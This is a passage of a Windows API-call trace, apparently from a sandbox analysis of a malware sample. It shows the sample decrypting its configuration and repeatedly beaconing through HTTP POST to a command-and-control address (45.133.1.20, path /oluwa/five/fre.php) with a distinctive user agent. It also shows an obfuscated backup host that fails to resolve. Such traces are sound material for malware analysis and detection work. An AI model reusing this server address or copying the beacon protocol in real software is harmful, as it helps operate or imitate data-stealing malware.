hHeap=0x6a0000) returned 1 [0281.533] GetProcessHeap () returned 0x6a0000 [0281.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0281.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.534] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0281.555] GetProcessHeap () returned 0x6a0000 [0281.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0281.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.557] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0281.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.558] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.560] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.560] GetProcessHeap () returned 0x6a0000 [0281.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0281.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.565] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0281.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.566] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0281.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0281.568] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0281.568] GetProcessHeap () returned 0x6a0000 [0281.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0281.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.569] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0281.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.571] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0281.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.572] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0281.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.573] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0281.573] GetProcessHeap () returned 0x6a0000 [0281.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0281.573] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0281.573] GetProcessHeap () returned 0x6a0000 [0281.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0281.573] socket (af=2, type=1, protocol=6) returned 0xa40 [0281.574] connect (s=0xa40, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0281.597] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0281.597] GetProcessHeap () returned 0x6a0000 [0281.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0281.597] GetProcessHeap () returned 0x6a0000 [0281.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0281.599] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0281.600] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0281.600] GetProcessHeap () returned 0x6a0000 [0281.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9cf0 [0281.601] GetProcessHeap () returned 0x6a0000 [0281.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0281.601] GetProcessHeap () returned 0x6a0000 [0281.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0281.601] GetProcessHeap () returned 0x6a0000 [0281.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0281.602] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0281.603] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0281.603] GetProcessHeap () returned 0x6a0000 [0281.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0281.603] GetProcessHeap () returned 0x6a0000 [0281.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0281.603] send (s=0xa40, buf=0x6bd460*, len=242, flags=0) returned 242 [0281.604] send (s=0xa40, buf=0x6bb998*, len=159, flags=0) returned 159 [0281.604] GetProcessHeap () returned 0x6a0000 [0281.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0281.605] recv (in: s=0xa40, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0282.019] GetProcessHeap () returned 0x6a0000 [0282.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0282.020] GetProcessHeap () returned 0x6a0000 [0282.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0282.021] GetProcessHeap () returned 0x6a0000 [0282.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9cf0 | out: hHeap=0x6a0000) returned 1 [0282.021] GetProcessHeap () returned 0x6a0000 [0282.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0282.021] closesocket (s=0xa40) returned 0 [0282.022] GetProcessHeap () returned 0x6a0000 [0282.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0282.022] GetProcessHeap () returned 0x6a0000 [0282.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0282.023] GetProcessHeap () returned 0x6a0000 [0282.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0282.023] GetProcessHeap () returned 0x6a0000 [0282.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0282.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17dc) returned 0xa40 [0282.039] Sleep (dwMilliseconds=0xea60) [0282.041] GetProcessHeap () returned 0x6a0000 [0282.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0282.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.042] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.049] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0282.056] GetProcessHeap () returned 0x6a0000 [0282.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d9b68 [0282.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.058] CryptImportKey (in: hProv=0x6beb90, pbData=0x6d9b68, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0282.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.059] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.064] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.064] GetProcessHeap () returned 0x6a0000 [0282.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b68 | out: hHeap=0x6a0000) returned 1 [0282.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.066] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0282.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.087] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0282.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.088] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0282.088] GetProcessHeap () returned 0x6a0000 [0282.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0282.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.097] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.100] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.100] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.104] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.104] GetProcessHeap () returned 0x6a0000 [0282.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0282.104] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.104] GetProcessHeap () returned 0x6a0000 [0282.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0282.105] GetProcessHeap () returned 0x6a0000 [0282.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0282.105] GetProcessHeap () returned 0x6a0000 [0282.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0282.106] GetProcessHeap () returned 0x6a0000 [0282.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0282.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0282.118] GetProcessHeap () returned 0x6a0000 [0282.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0282.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.119] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0282.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.120] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.121] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.121] GetProcessHeap () returned 0x6a0000 [0282.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0282.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.123] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0282.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.124] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0282.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.125] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0282.125] GetProcessHeap () returned 0x6a0000 [0282.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0282.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.126] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0282.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.127] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0282.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.129] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0282.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.130] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0282.130] GetProcessHeap () returned 0x6a0000 [0282.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0282.130] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0282.130] GetProcessHeap () returned 0x6a0000 [0282.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0282.130] socket (af=2, type=1, protocol=6) returned 0xa44 [0282.131] connect (s=0xa44, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0282.157] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0282.157] GetProcessHeap () returned 0x6a0000 [0282.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0282.157] GetProcessHeap () returned 0x6a0000 [0282.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0282.158] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0282.159] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0282.159] GetProcessHeap () returned 0x6a0000 [0282.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba5f0 [0282.159] GetProcessHeap () returned 0x6a0000 [0282.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0282.159] GetProcessHeap () returned 0x6a0000 [0282.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0282.159] GetProcessHeap () returned 0x6a0000 [0282.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0282.160] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0282.181] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0282.181] GetProcessHeap () returned 0x6a0000 [0282.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0282.181] GetProcessHeap () returned 0x6a0000 [0282.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0282.182] send (s=0xa44, buf=0x6bd460*, len=242, flags=0) returned 242 [0282.182] send (s=0xa44, buf=0x6bb998*, len=159, flags=0) returned 159 [0282.182] GetProcessHeap () returned 0x6a0000 [0282.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0282.182] recv (in: s=0xa44, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0282.260] GetProcessHeap () returned 0x6a0000 [0282.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0282.260] GetProcessHeap () returned 0x6a0000 [0282.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0282.261] GetProcessHeap () returned 0x6a0000 [0282.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba5f0 | out: hHeap=0x6a0000) returned 1 [0282.262] GetProcessHeap () returned 0x6a0000 [0282.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0282.262] closesocket (s=0xa44) returned 0 [0282.263] GetProcessHeap () returned 0x6a0000 [0282.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0282.263] GetProcessHeap () returned 0x6a0000 [0282.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0282.263] GetProcessHeap () returned 0x6a0000 [0282.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0282.264] GetProcessHeap () returned 0x6a0000 [0282.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0282.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17e0) returned 0xa44 [0282.268] Sleep (dwMilliseconds=0xea60) [0282.269] GetProcessHeap () returned 0x6a0000 [0282.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0282.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.271] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0282.289] GetProcessHeap () returned 0x6a0000 [0282.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dc790 [0282.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.290] CryptImportKey (in: hProv=0x6bf058, pbData=0x6dc790, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0282.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.291] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0282.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.292] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.292] GetProcessHeap () returned 0x6a0000 [0282.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc790 | out: hHeap=0x6a0000) returned 1 [0282.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.294] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0282.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.295] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0282.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.301] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0282.301] GetProcessHeap () returned 0x6a0000 [0282.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0282.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.302] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.303] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.304] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.305] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.305] GetProcessHeap () returned 0x6a0000 [0282.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0282.305] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0282.308] GetProcessHeap () returned 0x6a0000 [0282.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0282.309] GetProcessHeap () returned 0x6a0000 [0282.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0282.309] GetProcessHeap () returned 0x6a0000 [0282.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0282.311] GetProcessHeap () returned 0x6a0000 [0282.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0282.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0282.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0282.334] GetProcessHeap () returned 0x6a0000 [0282.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0282.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0282.335] 